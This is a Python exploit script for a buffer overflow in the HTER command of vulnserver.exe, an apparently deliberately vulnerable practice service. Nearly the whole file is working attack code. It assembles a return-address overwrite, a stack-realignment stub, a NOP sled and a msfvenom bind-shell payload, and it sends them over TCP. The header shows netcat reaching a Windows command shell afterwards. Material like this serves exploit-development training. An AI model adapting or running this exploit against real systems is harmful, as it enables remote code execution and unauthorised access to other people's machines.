#!/usr/bin/python
#
# November 2017 | github.com/rafaveira3
#
# Exploit vulnserver.exe - HTER - Buffer Overflow
#
# How I tested it:
# - Windows XP SP2.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://sites.google.com/site/lupingreycorner/vulnserver.zip
#
#
# Development Process:
# -
#
# PoC:
# Windows XP:
# - Double Click vulnserver.exe
#
# Kali:
# root@kali:~# python exploit-HTER.py
# root@kali:~# nc -nv 10.0.0.35 443
# (UNKNOWN) [10.0.0.35] 443 (https) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\rafael\Desktop\WORK\vulnserver>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import os
import sys
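# Return address: a "jmp eax" the original author located at 0x625011b1 in
# essfunc.dll (the original note spelled it "essfunc.fll").  Every component
# of the payload is ASCII hex, two characters per byte (see the msfvenom
# "-f hex" line below), so this is 0x625011b1 written little-endian:
# b1 11 50 62.  Re-verify the address in a debugger against the exact build
# you are testing before relying on it.
ret = "B1115062"
# msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f hex
# Payload Size: 355
shellcode = "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"
# Stack realignment stub placed in front of the shellcode:
#   50   PUSH EAX
#   5C   POP ESP   -> ESP now equals EAX, the register "jmp eax" lands through
#   90.. NOP sled
# NOTE(review): this assumes EAX points at the start of our buffer when the
# overwritten return address fires -- confirm in the debugger.
alignESP = "50"  # PUSH EAX
alignESP += "5C"  # POP ESP
alignESP += "90" * 32  # NOPs

# Layout constants.  All lengths are in hex *characters*, not bytes.
EIP_OFFSET = 2040      # hex chars from the start of the payload to the saved return address
TRAILER = "D" * 1152   # filler after the return address, kept from the original
CMD_PREFIX = "HTER 0"  # command prefix, byte-for-byte as the original sent it
DEFAULT_HOST = "10.0.0.35"
DEFAULT_PORT = 9999
HEX_DIGITS = frozenset("0123456789abcdefABCDEF")


def _check_hex(label, value):
    """Raise ValueError unless *value* is a non-empty, even-length hex string.

    Because the service consumes the payload as hex pairs, an odd-length or
    non-hex component would silently shift every byte that follows it.
    """
    if not value or len(value) % 2:
        raise ValueError(
            "%s must be a non-empty, even-length hex string (got %d chars)"
            % (label, len(value))
        )
    if not set(value) <= HEX_DIGITS:
        raise ValueError("%s contains non-hex characters" % label)


def build_payload(shellcode, ret_addr=ret, align_stub=alignESP,
                  eip_offset=EIP_OFFSET, trailer=TRAILER):
    """Return the full HTER request string for the given hex-encoded shellcode.

    Layout (lengths in hex characters)::

        CMD_PREFIX + align_stub + shellcode + "A" * pad + ret_addr + trailer

    where ``pad`` brings ``align_stub + shellcode`` up to ``eip_offset``.  This
    is exactly the string the original script assembled inline; the checks
    below only reject inputs that would otherwise produce a silently broken
    layout.

    Args:
        shellcode: hex-encoded shellcode (msfvenom ``-f hex`` output).
        ret_addr: hex-encoded little-endian return address.
        align_stub: hex-encoded stub placed in front of the shellcode.
        eip_offset: hex chars from the payload start to the return address.
        trailer: hex filler appended after the return address.

    Raises:
        ValueError: if shellcode, ret_addr or align_stub is not even-length
            hex, or if align_stub + shellcode no longer fits in front of the
            return address.  The original computed a negative padding in that
            case, which ``"A" * negative`` turns into an empty string, moving
            ``ret_addr`` off the return address without any error.
    """
    for label, value in (("shellcode", shellcode),
                         ("ret_addr", ret_addr),
                         ("align_stub", align_stub)):
        _check_hex(label, value)
    head = align_stub + shellcode
    pad_len = eip_offset - len(head)
    if pad_len < 0:
        raise ValueError(
            "align_stub + shellcode is %d hex chars, but only %d fit before "
            "the return address" % (len(head), eip_offset)
        )
    return CMD_PREFIX + head + "A" * pad_len + ret_addr + trailer


def send_payload(host, port, data):
    """Connect to host:port over TCP, send *data* (str) in full, then close.

    Uses ``sendall`` rather than ``send`` so a partial write cannot truncate
    the buffer, and closes the socket on every path (the original leaked it
    if connect() raised).  *data* is ASCII by construction -- hex digits plus
    the command prefix -- so the encode cannot fail; the explicit encode keeps
    the script working on both Python 2 and 3.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.sendall(data.encode("ascii"))
    finally:
        sock.close()


def main(argv=None):
    """Entry point: ``exploit-HTER.py [host [port]]``.

    With no arguments the target is the original hard-coded 10.0.0.35:9999.
    Only run this against a host you are explicitly authorised to test; see
    the disclaimer in the file header.

    Args:
        argv: argument list without the program name; defaults to sys.argv[1:].
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else DEFAULT_HOST
    port = int(args[1]) if len(args) > 1 else DEFAULT_PORT
    data = build_payload(shellcode)
    send_payload(host, port, data)
    sys.stdout.write("Sent %d bytes to %s:%d\n" % (len(data), host, port))


if __name__ == "__main__":
    main()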